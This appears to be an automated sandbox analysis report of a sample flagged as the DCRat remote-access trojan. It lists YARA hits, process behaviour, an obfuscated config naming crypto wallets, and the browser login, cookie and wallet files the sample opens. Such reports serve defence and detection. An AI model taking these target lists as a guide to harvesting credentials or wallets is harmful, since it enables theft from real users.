Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe VolumeInformation
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Queries volume information: C:\Users\user\Desktop\ogVinh0jhq.exe VolumeInformation
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Queries volume information: C:\Users\user\Desktop\ogVinh0jhq.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe VolumeInformation

Source: C:\Users\user\Desktop\ogVinh0jhq.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PC:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: TC:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: rC:\Windows\WinSxS\amd64_windows-defender-service_31bf3856ad364e35_10.0.19041.746_none_a39f6d9ab59bd8b7\MsMpEng.exe
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: -C:\Program Files\Windows Defender\MsMpEng.exe

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000008.00000002.2913632595.0000000005282000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2913632595.0000000005324000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2913632595.000000000539C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2913632595.00000000052BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 7812, type: MEMORYSTR
Source: Yara match	File source: 00000021.00000002.2311289217.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2540068591.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2228709323.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1725669334.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2216061800.000000000262E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1880725474.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2233192227.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1679368399.0000000002700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2216061800.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1679368399.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2153003374.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1679368399.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2062337075.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1978274690.000000000234D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2913632595.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2228709323.00000000025FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1880725474.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2311289217.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2208718575.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1978274690.0000000002351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1893760638.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2540068591.0000000003371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1725669334.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1725669334.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1681720996.00000000125CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ogVinh0jhq.exe PID: 7456, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 7836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ogVinh0jhq.exe PID: 7844, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ITlIQtTGhEyfMRHaLp.exe PID: 8036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ITlIQtTGhEyfMRHaLp.exe PID: 8048, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ogVinh0jhq.exe PID: 7480, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 7456, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ITlIQtTGhEyfMRHaLp.exe PID: 3652, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 1436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ITlIQtTGhEyfMRHaLp.exe PID: 5696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ITlIQtTGhEyfMRHaLp.exe PID: 6536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ITlIQtTGhEyfMRHaLp.exe PID: 7640, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: ogVinh0jhq.exe, 00000000.00000002.1679368399.00000000025C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {"ebf1c8a624aad5a504024645c9bfb8dac03df9a9":{"systemattr":"=U2csFmR","hiddenattr":"==QZ1JHV","clearicon":"=U2csFmR","randomversioninfo":"=U2csFmR"},"2d421f511019ab10b4005cadf6e8fab088ff728d":{"customexts":"","zcash":"==QZ1JHV","exodus":"==QZ1JHV","electrum":"==QZ1JHV","monero":"==QZ1JHV","ethereum":"==QZ1JHV","bytecoin":"==QZ1JHV","litecoincore":"==QZ1JHV","dashcore":"==QZ1JHV","bitcoincore":"==QZ1JHV","atomic":"==QZ1JHV","armory":"==QZ1JHV","binance":"==QZ1JHV","metamask":"==QZ1JHV","tronlink":"==QZ1JHV","ronin":"==QZ1JHV","binanceweb":"==QZ1JHV","phantom":"==QZ1JHV","ton":"==QZ1JHV","yoroi":"==QZ1JHV","extscanscheme":"yV2cVBCduVmcyV3Q"},"3229e69b07edc9bd628bb55e1896cde346364250":{"workscheme":"zRGbpVnQ"}}
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\keystore
Source: ogVinh0jhq.exe, 00000000.00000002.1679368399.00000000025C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {"ebf1c8a624aad5a504024645c9bfb8dac03df9a9":{"systemattr":"=U2csFmR","hiddenattr":"==QZ1JHV","clearicon":"=U2csFmR","randomversioninfo":"=U2csFmR"},"2d421f511019ab10b4005cadf6e8fab088ff728d":{"customexts":"","zcash":"==QZ1JHV","exodus":"==QZ1JHV","electrum":"==QZ1JHV","monero":"==QZ1JHV","ethereum":"==QZ1JHV","bytecoin":"==QZ1JHV","litecoincore":"==QZ1JHV","dashcore":"==QZ1JHV","bitcoincore":"==QZ1JHV","atomic":"==QZ1JHV","armory":"==QZ1JHV","binance":"==QZ1JHV","metamask":"==QZ1JHV","tronlink":"==QZ1JHV","ronin":"==QZ1JHV","binanceweb":"==QZ1JHV","phantom":"==QZ1JHV","ton":"==QZ1JHV","yoroi":"==QZ1JHV","extscanscheme":"yV2cVBCduVmcyV3Q"},"3229e69b07edc9bd628bb55e1896cde346364250":{"workscheme":"zRGbpVnQ"}}
Source: ogVinh0jhq.exe, 00000000.00000002.1679368399.00000000025C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {"ebf1c8a624aad5a504024645c9bfb8dac03df9a9":{"systemattr":"=U2csFmR","hiddenattr":"==QZ1JHV","clearicon":"=U2csFmR","randomversioninfo":"=U2csFmR"},"2d421f511019ab10b4005cadf6e8fab088ff728d":{"customexts":"","zcash":"==QZ1JHV","exodus":"==QZ1JHV","electrum":"==QZ1JHV","monero":"==QZ1JHV","ethereum":"==QZ1JHV","bytecoin":"==QZ1JHV","litecoincore":"==QZ1JHV","dashcore":"==QZ1JHV","bitcoincore":"==QZ1JHV","atomic":"==QZ1JHV","armory":"==QZ1JHV","binance":"==QZ1JHV","metamask":"==QZ1JHV","tronlink":"==QZ1JHV","ronin":"==QZ1JHV","binanceweb":"==QZ1JHV","phantom":"==QZ1JHV","ton":"==QZ1JHV","yoroi":"==QZ1JHV","extscanscheme":"yV2cVBCduVmcyV3Q"},"3229e69b07edc9bd628bb55e1896cde346364250":{"workscheme":"zRGbpVnQ"}}
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: ogVinh0jhq.exe, 00000000.00000000.1643358170.00000000000C2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Roaming\Binance\app-store.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Roaming\Binance\app-store.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Roaming\Binance\app-store.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Roaming\Binance\app-store.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000008.00000002.2913632595.0000000005282000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2913632595.0000000005324000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2913632595.000000000539C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2913632595.00000000052BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 7812, type: MEMORYSTR
Source: Yara match	File source: 00000021.00000002.2311289217.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2540068591.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2228709323.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1725669334.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2216061800.000000000262E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1880725474.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2233192227.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1679368399.0000000002700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2216061800.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1679368399.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2153003374.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1679368399.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2062337075.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1978274690.000000000234D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2913632595.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2228709323.00000000025FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
